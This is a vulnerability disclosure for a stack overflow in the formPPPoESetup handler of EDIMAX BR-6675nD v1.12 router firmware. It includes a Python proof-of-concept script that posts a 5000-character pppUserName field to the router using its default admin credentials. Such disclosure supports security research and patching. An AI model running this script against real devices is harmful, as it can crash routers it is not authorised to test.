BR-6675nD v1.12
The EDIMAX BR-6675nD v1.12 firmware has a stack overflow vulnerability in the formPPPoESetup function. The v35 variable receives the pppUserName parameter from a POST request. However, since the user can control the input of pppUserName, the statement strcat() can cause a buffer overflow.

import requests
ip = "192.168.2.1"
payload = "A"*5000
data = {
"submit-url": "",
"pppConnect": "",
"pppConnect1": "",
"pppDisconnect": "",
"pppDisconnect1": "",
"wanMode": "",
"pppServName": "",
"pppMTU": "",
"pppUserName": payload,
}
url = f'http://{ip}/goform/formPPPoESetup'
res = requests.post(url=url, data=data, auth=("admin", "1234"), verify=False)
print(res)
